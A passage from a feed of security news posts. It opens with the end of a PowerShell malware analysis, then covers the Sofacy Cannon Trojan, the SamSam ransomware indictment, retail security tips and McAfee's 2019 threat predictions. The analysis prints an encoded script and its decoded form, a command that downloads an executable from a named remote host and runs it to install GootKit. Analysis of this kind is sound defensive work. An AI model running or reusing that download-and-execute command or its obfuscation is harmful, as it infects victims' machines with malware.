+[CHar]101+ [CHar]109+ [CHar]112 + [CHar]92+[CHar]107+ [CHar]115 + [CHar]106 +[CHar]120+ [CHar]106 +[CHar]101+[CHar]119+ [CHar]117+ [CHar]104 + [CHar]117+ [CHar]107+[CHar]101 +[CHar]119+ [CHar]46+[CHar]101 +[CHar]120+[CHar]101 + [CHar]59+ [CHar]32+ [CHar]83 + [CHar]116+[CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 +[CHar]80+[CHar]114 +[CHar]111+ [CHar]99+ [CHar]101 + [CHar]115 +[CHar]115 +[CHar]32 +[CHar]36 +[CHar]101+[CHar]110+ [CHar]118 +[CHar]58 + [CHar]116 + [CHar]101 +[CHar]109 + [CHar]112 + [CHar]92+ [CHar]107+ [CHar]115 + [CHar]106+[CHar]120+[CHar]106 +[CHar]101 +[CHar]119 +[CHar]117+ [CHar]104+ [CHar]117 +[CHar]107 + [CHar]101 + [CHar]119+[CHar]46 +[CHar]101 + [CHar]120 + [CHar]101 )

At this point, a simple ASCII to char conversion make possible to decode and recover the final powershell command, unveiling the code purpose. It imports the BitsTransfer cmdlet (Background Intelligent Transfer Service) and proceeds to download and execute the GootKit malware.

  1. if($host.version.major -lt 3){
  2. Import-Module BitsTransfer
  3. }
  4. Start-BitsTransfer -Source https://predisposto.mattpodschweit.com/comuniv/inter.php7 -Destination $env:temp\ksjxjewuhukew.exe;
  5. Start-Process $env:temp\ksjxjewuhukew.exe

 

Conclusion

The initial script, at a first impression, seems obfuscated using some sophisticated techniques. However, analyzing its actual code shows how the clever usage of simple tricks such as variable replacement or decimal encoding, is able to hide a clearly malicious Powershell script, making it nearly undetectable by common anti-malware engines.

This analysis and many others are available on the official blog of the Yoroi cyber security firm.

Dissecting the Mindscrew-Powershell Obfuscation

Pierluigi Paganini

(Security Affairs – Powershell , VBScript)

The post Dissecting the Mindscrew-Powershell Obfuscation appeared first on Security Affairs.

Brazilian Financial Malware Spreads Beyond National Boundaries

Brazilian Actors Expand Financial Malware Campaigns to Attack Spanish-Speaking Countries

A detailed analysis from security researchers shows how Brazilian financial malware is spreading beyond national boundaries to attack banks in Spanish-speaking countries through South and Latin America, and Portugal and Spain in Europe. 

read more

Sofacy Group Targets Government Organizations With New Cannon Trojan

The Sofacy group recently targeted several government organizations around the world with the new Cannon Trojan.

In late October and early November, the Palo Alto Networks Unit 42 threat research team collected multiple weaponized documents targeting government organizations. The researchers couldn’t analyze all the files because the command-and-control (C&C) servers for some of them were down, but they managed to glean some valuable insights from two of the documents in particular.

The first file is a Microsoft Word document that loads a malicious macro when a user clicks the “enable content” button. This macro employs the AutoClose function to prevent Word from executing the malicious code until the user closes the document, thereby evading detection. At that point, the macro loads Zebrocy, an infostealer written in Delphi, which Sofacy has used since at least 2016.

The second document is very similar in structure to the first file, but executes a different payload: the Cannon Trojan. This new threat, which is written in C#, uses several email accounts to send system data and obtain a secondary payload from the attackers.

What’s Behind the Rise of Infostealers?

Zebrocy and Cannon aren’t the only infostealers Sofacy has employed in its attack campaigns. In the past, Symantec observed the group using another Trojan known as Seduploader to perform reconnaissance on an infected computer. The security firm also detected Sofacy’s execution of X-Agent as a second-stage infostealer.

These threats contributed to an overall increase in information stealers targeting government entities and regular organizations. In May 2018, FortiGuard noted a rise in data-stealing malware over the previous few months. Loki and Fareit experienced the most significant growth during that period.

How to Defend Against the Cannon Trojan

To defend against the Cannon Trojan and similar threats, security leaders should conduct ongoing phishing simulations with all employees. They should also take a layered approach to email security by implementing perimeter protection, scanning emails and conducting ongoing employee security awareness training.

Sources: Palo Alto Networks, Symantec, FortiGuard

The post Sofacy Group Targets Government Organizations With New Cannon Trojan appeared first on Security Intelligence.

U.S. DoJ charges Iranian duo over SamSam Ransomware activity

The U.S. DoJ charges two Iranian men over their alleged role in creating and spreading the infamous SamSam ransomware.

Two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27) have been charged by DoJ for their role in creating and distributing the dreaded SamSam ransomware.

The duo faces six hacking and extortion-related charges, including conspiracy to commit wire fraud, intentional damage to a protected computer, conspiracy to commit fraud and related activity in connection with computers,  and transmitting a demand in relation to damaging a protected computer.

The two Iranians are accused to have developed the SamSam ransomware in December 2015 and have continuously improved it.

“Extorted the Victims for ransom payments in exchange for the decryption keys to unlock the compromised computers.” reads the DoJ indictment. 

“The defendants hacked, encrypted, and extorted more than 200 Victims, and collected more than $6 million in ransom payments. The Victims incurred additional losses exceeding $30 million resulting from the loss of access to their data.”

The hackers extorted over 200 organizations, including public institutions, municipalities, and hospitals, they have caused over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by ransomware, the cyber attack was confirmed by the City officials.

The ransomware infection has caused the interruption of several city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the port of San Diego in September,  the incident impacted the processing park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT), the DOT has shut down the infected workstations.

In August, Sophos security firm published a report the SamSam ransomware, its experts tracked Bitcoin addresses managed by the crime gang and discovered that crooks had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

Prosecutors reported that Savandi and Mansouri used Iranian Bitcoin exchanges to exchange the cryptocurrency into Iranian rial.

The crooks used the Tor network to avoid being tracked, exports noticed that also encrypted data backups to prevent victims from recovering their encrypted files.

Authorities inserted the two Iranians in the FBI’s Cyber Most Wanted list.

Pierluigi Paganini

(Security Affairs – SamSam ransomware, Iranian hackers)

The post U.S. DoJ charges Iranian duo over SamSam Ransomware activity appeared first on Security Affairs.

5 Recommendations to Improve Retail Cybersecurity This Holiday Season

This is the first installment in a two-part series about how retailers can help protect their enterprises this holiday season.

With the holiday season upon us, retailers have an opportunity to boost revenues before the end of the year. Any increase in profit at the expense of retail cybersecurity, however, can cost a company more in the long run, given the rising size and costs of data breaches and associated revenue and reputational loss. With extra web traffic and high order volumes coming in, the holiday shopping season can be a particularly perilous time for businesses seeking to safeguard customer information.

A Timely Cause for Retail Cybersecurity Concerns

Tis the season for retailers to buckle down on security, since data breaches typically peak just prior to and during the holiday shopping season. IBM X-Force Incident Response and Intelligence Services (IRIS)’s assessment of X-Force Interactive Security Incident data recorded between 2012 and 2017 revealed that 41 percent of all retail and consumer product breaches occurred between September and December, elevating the risk for enterprise network breaches during that time of year. More than two-thirds of all records in the consumer products sector were leaked, lost or stolen during these last four months of the year — that’s nearly 180 million records each year.

Don’t Reward the Naughty

A growing number of retailers now offer rewards programs to retain and nurture their customer bases. For shoppers to join these programs, most retailers ask for personally identifiable information (PII) such as name, address, phone number and email address. If ever compromised, an attacker can correlate this customer PII to payment data and use it to aggregate information to compromise the user’s identity.

In line with recent regulatory laws such as the General Data Protection Regulation (GDPR), retailers should collect the least possible amount of PII on customers, have a clear purpose for each data element, and make sure to always keep data encrypted and safeguarded, both in transit and at rest.

Phishing Is in Season

Attackers don’t wait for the holiday season to begin launching spam campaigns, which are often employed as the first stage of their overall fraud and attack campaigns. Analysis of X-Force spam honeypot data collected between 2015 and 2018 revealed a notable rise in the average volume of spam emails beginning in August, with September slightly lower and October ranking third.

Average Spam per Month

Figure 1: Total volume of spam emails recorded, 2015–2018 (Source: IBM X-Force)

Preventing and responding to data breaches leading up to and during the holiday shopping season has become imperative. It is incumbent on retail security professionals to perform due diligence during this time, and there are several ways to accomplish this goal.

Below are five holiday season tips for retailers to help make your enterprise a safer shopping environment. These techniques can help retailers identify impending data breaches and sidestep the costs associated with a major data breach.

While I’ve listed these tips in the order of what I generally consider to be top-of-mind for retailers, this list can be customized to serve your organization’s specific needs.

1. Mitigate the POS Malware Threat

After a popular big box retailer suffered a breach in 2013, public awareness around the vulnerability of point-of-sale (POS) systems grew exponentially. That breach was facilitated by malware that infected POS machines and helped threat actors access a large volume of credit card information to sell to other criminals on the dark web. This intrusion resulted in the theft of more than 110 million records.

Five years later, POS malware continues to plague retailers. According to IBM X-Force, 74 percent of publicly reported POS malware breaches in 2017 impacted the retail sector. X-Force IRIS has observed malicious actors using POS malware, such as FrameworkPOS and PoSeidon, to siphon credit card data from POS terminals. Web-based malware, which steals credit card data on the fly as online transactions are processed, is also gaining steam.

To help mitigate these risks, both in physical and virtual realms, retailers should take the following steps:

  • Use some form of malware detection on your entire network to include the network of POS systems.
  • Test the devices’ hardware and software (more to come on penetration testing in the second installment of this series) and keep devices up-to-date through regular patching.
  • Work with a supplier that will contractually adhere to both your regulatory standards and security requirements.
  • When using mobile POS, have controls in place to ensure the integrity of the hand-held device and the encryption of its communication channels with the server that processes and stores card data.
  • Ensure any mobile payment system is from a trusted provider that supplies regular updates, patches, and equipment upgrades to comply with advances in encryption requirements and evolving threats.

Cybercriminals also commonly steal credit card data through payment card skimmers. These physical devices are fitted into the mouth of card readers and work by copying track data from the credit card and storing it on a memory chip inside the skimming device. In addition to retail establishments, skimmers are often found in ATMs, restaurants and gas stations.

As a precaution, retailers should frequently search for devices on their POS terminals and swiping equipment. Attackers typically attach skimmers to the device by sliding them onto the scanners and collecting them later. To check for a skimmer, examine devices daily and pull on the scanner if anything appears different. If part of the device comes off, it may be a skimming device. Call your service provider and IT security team to report it before resuming activity with that terminal or device.

With security controls and practices becoming more efficient, threat actors have resorted to gluing card skimmers to machines. This makes it difficult to detach by simply pulling it off the affected device. Retailers should train employees in all locations to recognize the proper look and components of their POS terminals and swiping devices. Employees should also know how to report suspicious devices.

2. A Clean Network Is a Safe Network

Payment card data carries immediate monetary value to criminals, and there are many methods by which they aim to steal it.

One tactic IBM X-Force researchers have seen increasingly often is the injection of malicious code into legitimate e-commerce websites. By compromising websites where people shop online, attackers can send payment data submitted during customer checkout to their own infrastructure.

To help reduce the likelihood of becoming a feeding ground for criminals, online retailers should take the following steps:

  • Harden the security of underlying web servers.
  • Limit access to critical assets and properly manage the privileges of those that maintain them.
  • Ensure that web applications are secure, harden them against threats like SQL injections and other common attacks, and have them tested regularly.
  • Deploy a change monitoring and detection solution to spot unauthorized modifications to your e-commerce platform’s web hosting directories. If this is not feasible, schedule periodic, manual reviews of these assets.

Account takeover (ATO), which occurs when a threat actor gains unauthorized access to an online account that belongs to someone else, can also affect e-commerce customers. With access to shoppers’ accounts, fraudsters can wreak havoc by stealing stored payment data, making fraudulent purchases and rerouting existing orders to a different address, for example.

Unauthorized access requires the use of legitimate credentials, which criminals can attain through a variety of tactics. The most common methods include phishing, brute-forcing weak passwords and launching SQL injection attacks on the web application itself.

You can help mitigate these threats by practicing good network hygiene. Here are some useful tips retailers can apply today to lower the risk of user account compromises:

  • Employ the most recent patches for all hardware, internal and external software, network communication protocols, and database security protocols.
  • Sanitize user input to prevent injection attacks.
  • Prioritize patching for the threats most relevant to your organization. Look out for the most-exploited vulnerabilities and ensure that internet-facing servers and systems are up to date.
  • Always consult your local computer emergency response team (CERT), IBM X-Force Exchange and other threat intelligence sources to gather the latest news on vulnerabilities and mitigation techniques.
  • Enforce multifactor authentication (MFA) for employees.

3. Go to Your Separate Corners

Cybercriminals are always leveraging new ways to steal payment card data and correlate it with PII. Elevated volumes of web traffic during the holiday season provide attackers with even more targets and opportunities.

To help keep customer data safe, even in cases where criminals manage to infiltrate assets, security teams should keep PII, financial data and POS information separate by segmenting enterprise networks. By keeping this information separated and encrypted, attackers will find it much harder to correlate data on customers. While segmenting a network can be an intensive process, it’s a small price to pay to keep customer data safe.

In network segmentation, allow only one IP address per segment to communicate at a time to detect suspicious traffic. While an attacker may spoof his or her IP address, this control can allow defenders to find out about most intruders rather easily. Here are some other best practices to consider:

  • Conduct internal audits for segment crossover to ensure that segregated data sets do not get mixed over time and appear in other places on the network, which can help attackers with identity theft.
  • Deploy web application firewalls (WAFs) to help ensure that incoming traffic is filtered, monitored and blocked to and from web applications to mitigate threats such as cross-site scripting (XSS) and SQL injection.
  • As a secondary measure, a firewall should be implemented to effectively govern all traffic coming in and out of the network. Firewall configuration is a key element in its effectiveness and should be performed by a certified network technician.
  • Have administrative users log in with a lower privilege level before escalating their privileges to perform updates and maintenance.
  • Prevent sensitive users and systems from communicating with the internet.

4. Learn From History and Educate Users

Nearly every company has some kind of data protection training in place. To make employee training programs more effective, organizations must understand that training materials are sometimes clicked through at a rapid pace to complete them as quickly as possible in favor of getting back to work. So how can an organization effectively educate their users?

  • Plan for role-based training of all employees in the organization.
  • Train employees on both physical and digital security.
  • Conduct short training sessions and field-test them by asking for employee feedback.
  • Launch an internal phishing campaign: Send a spoofed email from a dummy account with official-sounding names, titles and subjects, and track the number of users who click on the links or attachments. Offer additional training according to the conclusions from the campaign.
  • Identify users who need remedial training and retest as needed.
  • Most importantly, provide all users with an easily accessible resource to report issues. Users should be able to contact IT security with any question or suspicion.

For education to be effective, it has to be repetitive and stay top-of-mind for users across the entire organization. Get management to support awareness campaigns and find opportunities to educate users. Having vigilant employees makes mitigating attacks during the holiday season that much more effective. Frequent email reminders, illustrative posters and communicating best practices during team meetings can demonstrate your organization’s commitment to secure day-to-day conduct. Giving users personalized attention can go a long way toward making the message resonate with them — for example, you might consider gifting a security-themed mug for the holiday season.

5. Use Network IP Whitelists and Blacklists

Whitelists are IP addresses or domains used specifically for allowing access, whereas blacklists are used to help prevent IP addresses or domains from entering a network. Whitelists and blacklists are useful for keeping unauthorized and authorized connections within or outside the network. Keeping these lists up-to-date demands some diligence, but they can be crucial to boosting network security.

Filtering IPs according to these lists is more suitable for enterprises that do not manage e-commerce activity, since e-commerce companies have to accept inbound requests from all over the world, especially during the holiday shopping season.

These lists are much easier to maintain for networks that do not face external customers because blacklists can be used on both inbound and outbound access to help block known malicious hosts from communicating or accessing the organization’s data and assets. Below are some basic tips for filtering hosts:

  • Blacklist any IP addresses known to be malicious. Constantly updated lists can be fed into security solutions directly from threat intelligence platforms.
  • Should a blacklisted IP address have legitimate reasons for communicating with the network, investigate, confirm and allow access via the whitelist.
  • Whitelists should include any internal company addresses.
  • Whitelists should exclude any websites that are not relevant for employees carrying out their daily tasks (e.g., social media, webmail, etc.).
  • It is imperative to verify these lists periodically to help ensure that all information is accurate.
  • Should any IP addresses on the whitelist become outdated, it should be promptly removed or moved to the blacklist.
  • Keeping allowed and banned IP addresses from becoming intermingled is a basic premise of effective whitelist/blacklist practices.

Stay Tuned for More Holiday Season Tips for Retailers

There is no such thing as unimportant data. Take every necessary precaution to help protect enterprise and customer data by implementing strong retail cybersecurity controls, educating users and following current best practices. Maintaining customer confidence in your ability to protect their PII can result in more business, increased customer loyalty and stronger organizational reputation.

Stay tuned for five more tips to help retailers stay secure this holiday season.

Read the latest IBM X-Force Research

The post 5 Recommendations to Improve Retail Cybersecurity This Holiday Season appeared first on Security Intelligence.

McAfee Labs 2019 Threats Predictions Report

These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.

As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants show that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.

Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.

One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.

—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani

 

Predictions

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Artificial Intelligence the Future of Evasion Techniques

Synergistic Threats Will Multiply, Requiring Combined Responses

Misinformation, Extortion Attempts to Challenge Organizations’ Brands

Data Exfiltration Attacks to Target the Cloud

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.

We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.

Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.

As endpoint detection grows stronger, the vulnerable remote desktop protocol (RDP) offers another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP, attack it with ransomware, and propagate through networks either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.

We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.

Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.

We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.

Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit cards details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.

We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.

Artificial Intelligence the Future of Evasion Techniques

To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.

In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the RigExploit Kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.

Different evasions for different malware

In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:

  • Cryptocurrency mining: Miners implement a number of evasion techniques. One example is WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
  • Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
  • Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDOS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
  • Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.

Artificial intelligence the next weapon

In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.

Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages and avoiding detection.

Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.

Synergistic Threats Will Multiply, Requiring Combined Responses

This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaced, or synergistic, threats.

What could be worse?

Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.

One of the reasons synergic threats are becoming a reality is because bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.

An example is worth a thousand words

Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.

The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.

This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.

Be curious, be creative, connect your defenses

Tackling sophisticated attacks based on synergic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?

Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.

Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands

The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.

Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.

In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.

Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.

Data Exfiltration Attacks to Target the Cloud

In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.

With the increased adoption of Office 365, we have noticed a surge of attacks on the service— especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.

Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.

McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:

  • Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
  • Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
  • Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced due to customer misconfigurations) to launch cryptojacking or ransomware attacks into other variants of MITM attacks.

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.

But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.

For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.

(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).

This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.

Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.

Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/ tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.

Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.

Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.

